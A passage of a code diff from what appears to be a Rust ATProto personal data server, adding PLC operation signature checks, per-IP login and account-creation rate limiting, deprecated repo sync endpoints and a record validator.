.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
337
+
338
+
let op_type = obj.get("type")
339
+
.and_then(|v| v.as_str())
340
+
.unwrap_or("");
341
+
342
+
if op_type != "plc_operation" {
343
+
return Ok(());
344
+
}
345
+
346
+
let rotation_keys = obj.get("rotationKeys")
347
+
.and_then(|v| v.as_array())
348
+
.ok_or_else(|| PlcError::InvalidResponse("rotationKeys must be an array".to_string()))?;
349
+
350
+
let rotation_key_strings: Vec<&str> = rotation_keys
351
+
.iter()
352
+
.filter_map(|v| v.as_str())
353
+
.collect();
354
+
355
+
if !rotation_key_strings.contains(&ctx.server_rotation_key.as_str()) {
356
+
return Err(PlcError::InvalidResponse(
357
+
"Rotation keys do not include server's rotation key".to_string()
358
+
));
359
+
}
360
+
361
+
let verification_methods = obj.get("verificationMethods")
362
+
.and_then(|v| v.as_object())
363
+
.ok_or_else(|| PlcError::InvalidResponse("verificationMethods must be an object".to_string()))?;
364
+
365
+
if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) {
366
+
if atproto_key != ctx.expected_signing_key {
367
+
return Err(PlcError::InvalidResponse("Incorrect signing key".to_string()));
368
+
}
369
+
}
370
+
371
+
let also_known_as = obj.get("alsoKnownAs")
372
+
.and_then(|v| v.as_array())
373
+
.ok_or_else(|| PlcError::InvalidResponse("alsoKnownAs must be an array".to_string()))?;
374
+
375
+
let expected_handle_uri = format!("at://{}", ctx.expected_handle);
376
+
let has_correct_handle = also_known_as
377
+
.iter()
378
+
.filter_map(|v| v.as_str())
379
+
.any(|s| s == expected_handle_uri);
380
+
381
+
if !has_correct_handle && !also_known_as.is_empty() {
382
+
return Err(PlcError::InvalidResponse(
383
+
"Incorrect handle in alsoKnownAs".to_string()
384
+
));
385
+
}
386
+
387
+
let services = obj.get("services")
388
+
.and_then(|v| v.as_object())
389
+
.ok_or_else(|| PlcError::InvalidResponse("services must be an object".to_string()))?;
390
+
391
+
if let Some(pds_service) = services.get("atproto_pds").and_then(|v| v.as_object()) {
392
+
let service_type = pds_service.get("type").and_then(|v| v.as_str()).unwrap_or("");
393
+
if service_type != "AtprotoPersonalDataServer" {
394
+
return Err(PlcError::InvalidResponse(
395
+
"Incorrect type on atproto_pds service".to_string()
396
+
));
397
+
}
398
+
399
+
let endpoint = pds_service.get("endpoint").and_then(|v| v.as_str()).unwrap_or("");
400
+
if endpoint != ctx.expected_pds_endpoint {
401
+
return Err(PlcError::InvalidResponse(
402
+
"Incorrect endpoint on atproto_pds service".to_string()
403
+
));
404
+
}
405
+
}
406
+
407
+
Ok(())
408
+
}
409
+
410
+
pub fn verify_operation_signature(
411
+
op: &Value,
412
+
rotation_keys: &[String],
413
+
) -> Result<bool, PlcError> {
414
+
let obj = op.as_object()
415
+
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
416
+
417
+
let sig_b64 = obj.get("sig")
418
+
.and_then(|v| v.as_str())
419
+
.ok_or_else(|| PlcError::InvalidResponse("Missing sig".to_string()))?;
420
+
421
+
let sig_bytes = URL_SAFE_NO_PAD
422
+
.decode(sig_b64)
423
+
.map_err(|e| PlcError::InvalidResponse(format!("Invalid signature encoding: {}", e)))?;
424
+
425
+
let signature = Signature::from_slice(&sig_bytes)
426
+
.map_err(|e| PlcError::InvalidResponse(format!("Invalid signature format: {}", e)))?;
427
+
428
+
let mut unsigned_op = op.clone();
429
+
if let Some(unsigned_obj) = unsigned_op.as_object_mut() {
430
+
unsigned_obj.remove("sig");
431
+
}
432
+
433
+
let cbor_bytes = serde_ipld_dagcbor::to_vec(&unsigned_op)
434
+
.map_err(|e| PlcError::Serialization(e.to_string()))?;
435
+
436
+
for key_did in rotation_keys {
437
+
if let Ok(true) = verify_signature_with_did_key(key_did, &cbor_bytes, &signature) {
438
+
return Ok(true);
439
+
}
440
+
}
441
+
442
+
Ok(false)
443
+
}
444
+
445
+
fn verify_signature_with_did_key(
446
+
did_key: &str,
447
+
message: &[u8],
448
+
signature: &Signature,
449
+
) -> Result<bool, PlcError> {
450
+
use k256::ecdsa::{VerifyingKey, signature::Verifier};
451
+
452
+
if !did_key.starts_with("did:key:z") {
453
+
return Err(PlcError::InvalidResponse("Invalid did:key format".to_string()));
454
+
}
455
+
456
+
let multibase_part = &did_key[8..];
457
+
let (_, decoded) = multibase::decode(multibase_part)
458
+
.map_err(|e| PlcError::InvalidResponse(format!("Failed to decode did:key: {}", e)))?;
459
+
460
+
if decoded.len() < 2 {
461
+
return Err(PlcError::InvalidResponse("Invalid did:key data".to_string()));
462
+
}
463
+
464
+
let (codec, key_bytes) = if decoded[0] == 0xe7 && decoded[1] == 0x01 {
465
+
(0xe701u16, &decoded[2..])
466
+
} else {
467
+
return Err(PlcError::InvalidResponse("Unsupported key type in did:key".to_string()));
468
+
};
469
+
470
+
if codec != 0xe701 {
471
+
return Err(PlcError::InvalidResponse("Only secp256k1 keys are supported".to_string()));
472
+
}
473
+
474
+
let verifying_key = VerifyingKey::from_sec1_bytes(key_bytes)
475
+
.map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?;
476
+
477
+
Ok(verifying_key.verify(message, signature).is_ok())
478
+
}
479
+
480
#[cfg(test)]
481
mod tests {
482
use super::*;
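A sketch of how the two new checks are presumably combined before an operation is forwarded to the PLC directory; the wrapper and the source of the context values (server config, current DID document) are assumptions:

fn check_submission(
    operation: &serde_json::Value,
    ctx: &PlcValidationContext,
    current_rotation_keys: &[String],
) -> Result<(), PlcError> {
    // Structural checks: rotation keys, signing key, handle, PDS endpoint.
    validate_plc_operation_for_submission(operation, ctx)?;
    // Cryptographic check against the rotation keys currently on record.
    if !verify_operation_signature(operation, current_rotation_keys)? {
        return Err(PlcError::InvalidResponse(
            "Operation is not signed by a current rotation key".to_string(),
        ));
    }
    Ok(())
}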
+216
src/rate_limit.rs
+216
src/rate_limit.rs
···
···
1
+
use axum::{
2
+
body::Body,
3
+
extract::ConnectInfo,
4
+
http::{HeaderMap, Request, StatusCode},
5
+
middleware::Next,
6
+
response::{IntoResponse, Response},
7
+
Json,
8
+
};
9
+
use governor::{
10
+
Quota, RateLimiter,
11
+
clock::DefaultClock,
12
+
state::{InMemoryState, NotKeyed, keyed::DefaultKeyedStateStore},
13
+
};
14
+
use std::{
15
+
net::SocketAddr,
16
+
num::NonZeroU32,
17
+
sync::Arc,
18
+
};
19
+
20
+
pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>;
21
+
pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>;
22
+
23
+
#[derive(Clone)]
24
+
pub struct RateLimiters {
25
+
pub login: Arc<KeyedRateLimiter>,
26
+
pub oauth_token: Arc<KeyedRateLimiter>,
27
+
pub password_reset: Arc<KeyedRateLimiter>,
28
+
pub account_creation: Arc<KeyedRateLimiter>,
29
+
}
30
+
31
+
impl Default for RateLimiters {
32
+
fn default() -> Self {
33
+
Self::new()
34
+
}
35
+
}
36
+
37
+
impl RateLimiters {
38
+
pub fn new() -> Self {
39
+
Self {
40
+
login: Arc::new(RateLimiter::keyed(
41
+
Quota::per_minute(NonZeroU32::new(10).unwrap())
42
+
)),
43
+
oauth_token: Arc::new(RateLimiter::keyed(
44
+
Quota::per_minute(NonZeroU32::new(30).unwrap())
45
+
)),
46
+
password_reset: Arc::new(RateLimiter::keyed(
47
+
Quota::per_hour(NonZeroU32::new(5).unwrap())
48
+
)),
49
+
account_creation: Arc::new(RateLimiter::keyed(
50
+
Quota::per_hour(NonZeroU32::new(10).unwrap())
51
+
)),
52
+
}
53
+
}
54
+
55
+
pub fn with_login_limit(mut self, per_minute: u32) -> Self {
56
+
self.login = Arc::new(RateLimiter::keyed(
57
+
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
58
+
));
59
+
self
60
+
}
61
+
62
+
pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self {
63
+
self.oauth_token = Arc::new(RateLimiter::keyed(
64
+
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()))
65
+
));
66
+
self
67
+
}
68
+
69
+
pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self {
70
+
self.password_reset = Arc::new(RateLimiter::keyed(
71
+
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
72
+
));
73
+
self
74
+
}
75
+
76
+
pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self {
77
+
self.account_creation = Arc::new(RateLimiter::keyed(
78
+
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()))
79
+
));
80
+
self
81
+
}
82
+
}
83
+
84
+
fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
85
+
if let Some(forwarded) = headers.get("x-forwarded-for") {
86
+
if let Ok(value) = forwarded.to_str() {
87
+
if let Some(first_ip) = value.split(',').next() {
88
+
return first_ip.trim().to_string();
89
+
}
90
+
}
91
+
}
92
+
93
+
if let Some(real_ip) = headers.get("x-real-ip") {
94
+
if let Ok(value) = real_ip.to_str() {
95
+
return value.trim().to_string();
96
+
}
97
+
}
98
+
99
+
addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string())
100
+
}
101
+
102
+
fn rate_limit_response() -> Response {
103
+
(
104
+
StatusCode::TOO_MANY_REQUESTS,
105
+
Json(serde_json::json!({
106
+
"error": "RateLimitExceeded",
107
+
"message": "Too many requests. Please try again later."
108
+
})),
109
+
)
110
+
.into_response()
111
+
}
112
+
113
+
pub async fn login_rate_limit(
114
+
ConnectInfo(addr): ConnectInfo<SocketAddr>,
115
+
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
116
+
request: Request<Body>,
117
+
next: Next,
118
+
) -> Response {
119
+
let client_ip = extract_client_ip(request.headers(), Some(addr));
120
+
121
+
if limiters.login.check_key(&client_ip).is_err() {
122
+
tracing::warn!(ip = %client_ip, "Login rate limit exceeded");
123
+
return rate_limit_response();
124
+
}
125
+
126
+
next.run(request).await
127
+
}
128
+
129
+
pub async fn oauth_token_rate_limit(
130
+
ConnectInfo(addr): ConnectInfo<SocketAddr>,
131
+
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
132
+
request: Request<Body>,
133
+
next: Next,
134
+
) -> Response {
135
+
let client_ip = extract_client_ip(request.headers(), Some(addr));
136
+
137
+
if limiters.oauth_token.check_key(&client_ip).is_err() {
138
+
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
139
+
return rate_limit_response();
140
+
}
141
+
142
+
next.run(request).await
143
+
}
144
+
145
+
pub async fn password_reset_rate_limit(
146
+
ConnectInfo(addr): ConnectInfo<SocketAddr>,
147
+
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
148
+
request: Request<Body>,
149
+
next: Next,
150
+
) -> Response {
151
+
let client_ip = extract_client_ip(request.headers(), Some(addr));
152
+
153
+
if limiters.password_reset.check_key(&client_ip).is_err() {
154
+
tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded");
155
+
return rate_limit_response();
156
+
}
157
+
158
+
next.run(request).await
159
+
}
160
+
161
+
pub async fn account_creation_rate_limit(
162
+
ConnectInfo(addr): ConnectInfo<SocketAddr>,
163
+
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
164
+
request: Request<Body>,
165
+
next: Next,
166
+
) -> Response {
167
+
let client_ip = extract_client_ip(request.headers(), Some(addr));
168
+
169
+
if limiters.account_creation.check_key(&client_ip).is_err() {
170
+
tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded");
171
+
return rate_limit_response();
172
+
}
173
+
174
+
next.run(request).await
175
+
}
176
+
177
+
#[cfg(test)]
178
+
mod tests {
179
+
use super::*;
180
+
181
+
#[test]
182
+
fn test_rate_limiters_creation() {
183
+
let limiters = RateLimiters::new();
184
+
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
185
+
}
186
+
187
+
#[test]
188
+
fn test_rate_limiter_exhaustion() {
189
+
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap()));
190
+
let key = "test_ip".to_string();
191
+
192
+
assert!(limiter.check_key(&key).is_ok());
193
+
assert!(limiter.check_key(&key).is_ok());
194
+
assert!(limiter.check_key(&key).is_err());
195
+
}
196
+
197
+
#[test]
198
+
fn test_different_keys_have_separate_limits() {
199
+
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap()));
200
+
201
+
assert!(limiter.check_key(&"ip1".to_string()).is_ok());
202
+
assert!(limiter.check_key(&"ip1".to_string()).is_err());
203
+
assert!(limiter.check_key(&"ip2".to_string()).is_ok());
204
+
}
205
+
206
+
#[test]
207
+
fn test_builder_pattern() {
208
+
let limiters = RateLimiters::new()
209
+
.with_login_limit(20)
210
+
.with_oauth_token_limit(60)
211
+
.with_password_reset_limit(3)
212
+
.with_account_creation_limit(5);
213
+
214
+
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
215
+
}
216
+
}
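
A minimal sketch of how these middleware functions might be attached to individual routes with axum's middleware::from_fn_with_state; the handler names and router layout are illustrative, not taken from this PR's router wiring, and the ConnectInfo<SocketAddr> extractor only resolves when the app is served via into_make_service_with_connect_info::<SocketAddr>().

use std::sync::Arc;
use axum::{middleware, routing::post, Router};
use crate::rate_limit::{account_creation_rate_limit, login_rate_limit, RateLimiters};

// Placeholder handlers standing in for the real XRPC endpoints.
async fn create_session() -> &'static str { "ok" }
async fn create_account() -> &'static str { "ok" }

// Attach a per-endpoint limiter as route-level middleware; `limiters` is the
// same Arc<RateLimiters> that lives on AppState.
fn rate_limited_routes(limiters: Arc<RateLimiters>) -> Router {
    Router::new()
        .route(
            "/xrpc/com.atproto.server.createSession",
            post(create_session)
                .layer(middleware::from_fn_with_state(limiters.clone(), login_rate_limit)),
        )
        .route(
            "/xrpc/com.atproto.server.createAccount",
            post(create_account)
                .layer(middleware::from_fn_with_state(limiters, account_creation_rate_limit)),
        )
}
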
+18
src/state.rs
···
1
use crate::config::AuthConfig;
2
use crate::repo::PostgresBlockStore;
3
use crate::storage::{BlobStorage, S3BlobStorage};
4
use crate::sync::firehose::SequencedEvent;
···
12
pub block_store: PostgresBlockStore,
13
pub blob_store: Arc<dyn BlobStorage>,
14
pub firehose_tx: broadcast::Sender<SequencedEvent>,
15
}
16
17
impl AppState {
···
21
let block_store = PostgresBlockStore::new(db.clone());
22
let blob_store = S3BlobStorage::new().await;
23
let (firehose_tx, _) = broadcast::channel(1000);
24
Self {
25
db,
26
block_store,
27
blob_store: Arc::new(blob_store),
28
firehose_tx,
29
}
30
}
31
}
···
1
+
use crate::circuit_breaker::CircuitBreakers;
2
use crate::config::AuthConfig;
3
+
use crate::rate_limit::RateLimiters;
4
use crate::repo::PostgresBlockStore;
5
use crate::storage::{BlobStorage, S3BlobStorage};
6
use crate::sync::firehose::SequencedEvent;
···
14
pub block_store: PostgresBlockStore,
15
pub blob_store: Arc<dyn BlobStorage>,
16
pub firehose_tx: broadcast::Sender<SequencedEvent>,
17
+
pub rate_limiters: Arc<RateLimiters>,
18
+
pub circuit_breakers: Arc<CircuitBreakers>,
19
}
20
21
impl AppState {
···
25
let block_store = PostgresBlockStore::new(db.clone());
26
let blob_store = S3BlobStorage::new().await;
27
let (firehose_tx, _) = broadcast::channel(1000);
28
+
let rate_limiters = Arc::new(RateLimiters::new());
29
+
let circuit_breakers = Arc::new(CircuitBreakers::new());
30
Self {
31
db,
32
block_store,
33
blob_store: Arc::new(blob_store),
34
firehose_tx,
35
+
rate_limiters,
36
+
circuit_breakers,
37
}
38
+
}
39
+
40
+
pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self {
41
+
self.rate_limiters = Arc::new(rate_limiters);
42
+
self
43
+
}
44
+
45
+
pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self {
46
+
self.circuit_breakers = Arc::new(circuit_breakers);
47
+
self
48
}
49
}
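
A short sketch of how the new builder methods could be chained when constructing state; it assumes AppState::new(db) keeps the async, pool-taking signature implied by the body above, and the overridden limits are illustrative values only.

use crate::circuit_breaker::CircuitBreakers;
use crate::rate_limit::RateLimiters;
use crate::state::AppState;

// `db` is the sqlx PgPool created at startup; the limits below are examples, not defaults.
async fn build_state(db: sqlx::PgPool) -> AppState {
    AppState::new(db)
        .await
        .with_rate_limiters(
            RateLimiters::new()
                .with_login_limit(5)
                .with_password_reset_limit(3),
        )
        .with_circuit_breakers(CircuitBreakers::new())
}
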
-4
src/sync/crawl.rs
···
19
Query(params): Query<NotifyOfUpdateParams>,
20
) -> Response {
21
info!("Received notifyOfUpdate from hostname: {}", params.hostname);
22
-
info!("TODO: Queue job for notifyOfUpdate (not implemented)");
23
-
24
(StatusCode::OK, Json(json!({}))).into_response()
25
}
26
···
34
Json(input): Json<RequestCrawlInput>,
35
) -> Response {
36
info!("Received requestCrawl for hostname: {}", input.hostname);
37
-
info!("TODO: Queue job for requestCrawl (not implemented)");
38
-
39
(StatusCode::OK, Json(json!({}))).into_response()
40
}
···
19
Query(params): Query<NotifyOfUpdateParams>,
20
) -> Response {
21
info!("Received notifyOfUpdate from hostname: {}", params.hostname);
22
(StatusCode::OK, Json(json!({}))).into_response()
23
}
24
···
32
Json(input): Json<RequestCrawlInput>,
33
) -> Response {
34
info!("Received requestCrawl for hostname: {}", input.hostname);
35
(StatusCode::OK, Json(json!({}))).into_response()
36
}
+209
src/sync/deprecated.rs
···
···
1
+
use crate::state::AppState;
2
+
use crate::sync::car::encode_car_header;
3
+
use axum::{
4
+
Json,
5
+
extract::{Query, State},
6
+
http::StatusCode,
7
+
response::{IntoResponse, Response},
8
+
};
9
+
use cid::Cid;
10
+
use ipld_core::ipld::Ipld;
11
+
use jacquard_repo::storage::BlockStore;
12
+
use serde::{Deserialize, Serialize};
13
+
use serde_json::json;
14
+
use std::io::Write;
15
+
use std::str::FromStr;
16
+
use tracing::error;
17
+
18
+
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
19
+
20
+
#[derive(Deserialize)]
21
+
pub struct GetHeadParams {
22
+
pub did: String,
23
+
}
24
+
25
+
#[derive(Serialize)]
26
+
pub struct GetHeadOutput {
27
+
pub root: String,
28
+
}
29
+
30
+
pub async fn get_head(
31
+
State(state): State<AppState>,
32
+
Query(params): Query<GetHeadParams>,
33
+
) -> Response {
34
+
let did = params.did.trim();
35
+
36
+
if did.is_empty() {
37
+
return (
38
+
StatusCode::BAD_REQUEST,
39
+
Json(json!({"error": "InvalidRequest", "message": "did is required"})),
40
+
)
41
+
.into_response();
42
+
}
43
+
44
+
let result = sqlx::query!(
45
+
r#"
46
+
SELECT r.repo_root_cid
47
+
FROM repos r
48
+
JOIN users u ON r.user_id = u.id
49
+
WHERE u.did = $1
50
+
"#,
51
+
did
52
+
)
53
+
.fetch_optional(&state.db)
54
+
.await;
55
+
56
+
match result {
57
+
Ok(Some(row)) => (StatusCode::OK, Json(GetHeadOutput { root: row.repo_root_cid })).into_response(),
58
+
Ok(None) => (
59
+
StatusCode::BAD_REQUEST,
60
+
Json(json!({"error": "HeadNotFound", "message": "Could not find root for DID"})),
61
+
)
62
+
.into_response(),
63
+
Err(e) => {
64
+
error!("DB error in get_head: {:?}", e);
65
+
(
66
+
StatusCode::INTERNAL_SERVER_ERROR,
67
+
Json(json!({"error": "InternalError"})),
68
+
)
69
+
.into_response()
70
+
}
71
+
}
72
+
}
73
+
74
+
#[derive(Deserialize)]
75
+
pub struct GetCheckoutParams {
76
+
pub did: String,
77
+
}
78
+
79
+
pub async fn get_checkout(
80
+
State(state): State<AppState>,
81
+
Query(params): Query<GetCheckoutParams>,
82
+
) -> Response {
83
+
let did = params.did.trim();
84
+
85
+
if did.is_empty() {
86
+
return (
87
+
StatusCode::BAD_REQUEST,
88
+
Json(json!({"error": "InvalidRequest", "message": "did is required"})),
89
+
)
90
+
.into_response();
91
+
}
92
+
93
+
let repo_row = sqlx::query!(
94
+
r#"
95
+
SELECT r.repo_root_cid
96
+
FROM repos r
97
+
JOIN users u ON u.id = r.user_id
98
+
WHERE u.did = $1
99
+
"#,
100
+
did
101
+
)
102
+
.fetch_optional(&state.db)
103
+
.await
104
+
.unwrap_or(None);
105
+
106
+
let head_str = match repo_row {
107
+
Some(r) => r.repo_root_cid,
108
+
None => {
109
+
let user_exists = sqlx::query!("SELECT id FROM users WHERE did = $1", did)
110
+
.fetch_optional(&state.db)
111
+
.await
112
+
.unwrap_or(None);
113
+
114
+
if user_exists.is_none() {
115
+
return (
116
+
StatusCode::NOT_FOUND,
117
+
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
118
+
)
119
+
.into_response();
120
+
} else {
121
+
return (
122
+
StatusCode::NOT_FOUND,
123
+
Json(json!({"error": "RepoNotFound", "message": "Repo not initialized"})),
124
+
)
125
+
.into_response();
126
+
}
127
+
}
128
+
};
129
+
130
+
let head_cid = match Cid::from_str(&head_str) {
131
+
Ok(c) => c,
132
+
Err(_) => {
133
+
return (
134
+
StatusCode::INTERNAL_SERVER_ERROR,
135
+
Json(json!({"error": "InternalError", "message": "Invalid head CID"})),
136
+
)
137
+
.into_response();
138
+
}
139
+
};
140
+
141
+
let mut car_bytes = match encode_car_header(&head_cid) {
142
+
Ok(h) => h,
143
+
Err(e) => {
144
+
return (
145
+
StatusCode::INTERNAL_SERVER_ERROR,
146
+
Json(json!({"error": "InternalError", "message": format!("Failed to encode CAR header: {}", e)})),
147
+
)
148
+
.into_response();
149
+
}
150
+
};
151
+
152
+
let mut stack = vec![head_cid];
153
+
let mut visited = std::collections::HashSet::new();
154
+
let mut remaining = MAX_REPO_BLOCKS_TRAVERSAL;
155
+
156
+
while let Some(cid) = stack.pop() {
157
+
if visited.contains(&cid) {
158
+
continue;
159
+
}
160
+
visited.insert(cid);
161
+
if remaining == 0 {
162
+
break;
163
+
}
164
+
remaining -= 1;
165
+
166
+
if let Ok(Some(block)) = state.block_store.get(&cid).await {
167
+
let cid_bytes = cid.to_bytes();
168
+
let total_len = cid_bytes.len() + block.len();
169
+
let mut writer = Vec::new();
170
+
crate::sync::car::write_varint(&mut writer, total_len as u64)
171
+
.expect("Writing to Vec<u8> should never fail");
172
+
writer.write_all(&cid_bytes)
173
+
.expect("Writing to Vec<u8> should never fail");
174
+
writer.write_all(&block)
175
+
.expect("Writing to Vec<u8> should never fail");
176
+
car_bytes.extend_from_slice(&writer);
177
+
178
+
if let Ok(value) = serde_ipld_dagcbor::from_slice::<Ipld>(&block) {
179
+
extract_links_ipld(&value, &mut stack);
180
+
}
181
+
}
182
+
}
183
+
184
+
(
185
+
StatusCode::OK,
186
+
[(axum::http::header::CONTENT_TYPE, "application/vnd.ipld.car")],
187
+
car_bytes,
188
+
)
189
+
.into_response()
190
+
}
191
+
192
+
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
193
+
match value {
194
+
Ipld::Link(cid) => {
195
+
stack.push(*cid);
196
+
}
197
+
Ipld::Map(map) => {
198
+
for v in map.values() {
199
+
extract_links_ipld(v, stack);
200
+
}
201
+
}
202
+
Ipld::List(arr) => {
203
+
for v in arr {
204
+
extract_links_ipld(v, stack);
205
+
}
206
+
}
207
+
_ => {}
208
+
}
209
+
}
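
For reference, a sketch of how the two handlers above might be mounted; the paths follow the com.atproto.sync lexicon names, while the actual router wiring is outside this diff.

use axum::{routing::get, Router};
use crate::state::AppState;

// Deprecated sync endpoints kept for older clients and relays.
fn deprecated_sync_routes() -> Router<AppState> {
    Router::new()
        .route("/xrpc/com.atproto.sync.getHead", get(crate::sync::get_head))
        .route("/xrpc/com.atproto.sync.getCheckout", get(crate::sync::get_checkout))
}
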
+3
-2
src/sync/mod.rs
···
2
pub mod car;
3
pub mod commit;
4
pub mod crawl;
5
pub mod firehose;
6
pub mod frame;
7
pub mod import;
8
pub mod listener;
9
-
pub mod relay_client;
10
pub mod repo;
11
pub mod subscribe_repos;
12
pub mod util;
···
15
pub use blob::{get_blob, list_blobs};
16
pub use commit::{get_latest_commit, get_repo_status, list_repos};
17
pub use crawl::{notify_of_update, request_crawl};
18
-
pub use repo::{get_blocks, get_repo, get_record};
19
pub use subscribe_repos::subscribe_repos;
20
pub use verify::{CarVerifier, VerifiedCar, VerifyError};
···
2
pub mod car;
3
pub mod commit;
4
pub mod crawl;
5
+
pub mod deprecated;
6
pub mod firehose;
7
pub mod frame;
8
pub mod import;
9
pub mod listener;
10
pub mod repo;
11
pub mod subscribe_repos;
12
pub mod util;
···
15
pub use blob::{get_blob, list_blobs};
16
pub use commit::{get_latest_commit, get_repo_status, list_repos};
17
pub use crawl::{notify_of_update, request_crawl};
18
+
pub use deprecated::{get_checkout, get_head};
19
+
pub use repo::{get_blocks, get_record, get_repo};
20
pub use subscribe_repos::subscribe_repos;
21
pub use verify::{CarVerifier, VerifiedCar, VerifyError};
-83
src/sync/relay_client.rs
···
1
-
use crate::state::AppState;
2
-
use crate::sync::util::format_event_for_sending;
3
-
use futures::{sink::SinkExt, stream::StreamExt};
4
-
use std::time::Duration;
5
-
use tokio::sync::mpsc;
6
-
use tokio_tungstenite::{connect_async, tungstenite::Message};
7
-
use tracing::{error, info, warn};
8
-
9
-
async fn run_relay_client(state: AppState, url: String, ready_tx: Option<mpsc::Sender<()>>) {
10
-
info!("Starting firehose client for relay: {}", url);
11
-
loop {
12
-
match connect_async(&url).await {
13
-
Ok((mut ws_stream, _)) => {
14
-
info!("Connected to firehose relay: {}", url);
15
-
let mut rx = state.firehose_tx.subscribe();
16
-
if let Some(tx) = ready_tx.as_ref() {
17
-
tx.send(()).await.ok();
18
-
}
19
-
20
-
loop {
21
-
tokio::select! {
22
-
Ok(event) = rx.recv() => {
23
-
match format_event_for_sending(&state, event).await {
24
-
Ok(bytes) => {
25
-
if let Err(e) = ws_stream.send(Message::Binary(bytes.into())).await {
26
-
warn!("Failed to send event to {}: {}. Disconnecting.", url, e);
27
-
break;
28
-
}
29
-
}
30
-
Err(e) => {
31
-
error!("Failed to format event for relay {}: {}", url, e);
32
-
}
33
-
}
34
-
}
35
-
Some(msg) = ws_stream.next() => {
36
-
if let Ok(Message::Close(_)) = msg {
37
-
warn!("Relay {} closed connection.", url);
38
-
break;
39
-
}
40
-
}
41
-
else => break,
42
-
}
43
-
}
44
-
}
45
-
Err(e) => {
46
-
error!("Failed to connect to firehose relay {}: {}", url, e);
47
-
}
48
-
}
49
-
warn!(
50
-
"Disconnected from {}. Reconnecting in 5 seconds...",
51
-
url
52
-
);
53
-
tokio::time::sleep(Duration::from_secs(5)).await;
54
-
}
55
-
}
56
-
57
-
pub async fn start_relay_clients(
58
-
state: AppState,
59
-
relays: Vec<String>,
60
-
mut ready_rx: Option<mpsc::Receiver<()>>,
61
-
) {
62
-
if relays.is_empty() {
63
-
return;
64
-
}
65
-
66
-
let (ready_tx, mut internal_ready_rx) = mpsc::channel(1);
67
-
68
-
for url in relays {
69
-
let ready_tx = if ready_rx.is_some() {
70
-
Some(ready_tx.clone())
71
-
} else {
72
-
None
73
-
};
74
-
tokio::spawn(run_relay_client(state.clone(), url, ready_tx));
75
-
}
76
-
77
-
if let Some(mut rx) = ready_rx.take() {
78
-
tokio::spawn(async move {
79
-
internal_ready_rx.recv().await;
80
-
rx.close();
81
-
});
82
-
}
83
-
}
···
+504
src/validation/mod.rs
···
···
1
+
use serde_json::Value;
2
+
use thiserror::Error;
3
+
4
+
#[derive(Debug, Error)]
5
+
pub enum ValidationError {
6
+
#[error("No $type provided")]
7
+
MissingType,
8
+
9
+
#[error("Invalid $type: expected {expected}, got {actual}")]
10
+
TypeMismatch { expected: String, actual: String },
11
+
12
+
#[error("Missing required field: {0}")]
13
+
MissingField(String),
14
+
15
+
#[error("Invalid field value at {path}: {message}")]
16
+
InvalidField { path: String, message: String },
17
+
18
+
#[error("Invalid datetime format at {path}: must be RFC-3339/ISO-8601")]
19
+
InvalidDatetime { path: String },
20
+
21
+
#[error("Invalid record: {0}")]
22
+
InvalidRecord(String),
23
+
24
+
#[error("Unknown record type: {0}")]
25
+
UnknownType(String),
26
+
}
27
+
28
+
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
29
+
pub enum ValidationStatus {
30
+
Valid,
31
+
Unknown,
32
+
Invalid,
33
+
}
34
+
35
+
pub struct RecordValidator {
36
+
require_lexicon: bool,
37
+
}
38
+
39
+
impl Default for RecordValidator {
40
+
fn default() -> Self {
41
+
Self::new()
42
+
}
43
+
}
44
+
45
+
impl RecordValidator {
46
+
pub fn new() -> Self {
47
+
Self {
48
+
require_lexicon: false,
49
+
}
50
+
}
51
+
52
+
pub fn require_lexicon(mut self, require: bool) -> Self {
53
+
self.require_lexicon = require;
54
+
self
55
+
}
56
+
57
+
pub fn validate(
58
+
&self,
59
+
record: &Value,
60
+
collection: &str,
61
+
) -> Result<ValidationStatus, ValidationError> {
62
+
let obj = record
63
+
.as_object()
64
+
.ok_or_else(|| ValidationError::InvalidRecord("Record must be an object".to_string()))?;
65
+
66
+
let record_type = obj
67
+
.get("$type")
68
+
.and_then(|v| v.as_str())
69
+
.ok_or(ValidationError::MissingType)?;
70
+
71
+
if record_type != collection {
72
+
return Err(ValidationError::TypeMismatch {
73
+
expected: collection.to_string(),
74
+
actual: record_type.to_string(),
75
+
});
76
+
}
77
+
78
+
if let Some(created_at) = obj.get("createdAt").and_then(|v| v.as_str()) {
79
+
validate_datetime(created_at, "createdAt")?;
80
+
}
81
+
82
+
match record_type {
83
+
"app.bsky.feed.post" => self.validate_post(obj)?,
84
+
"app.bsky.actor.profile" => self.validate_profile(obj)?,
85
+
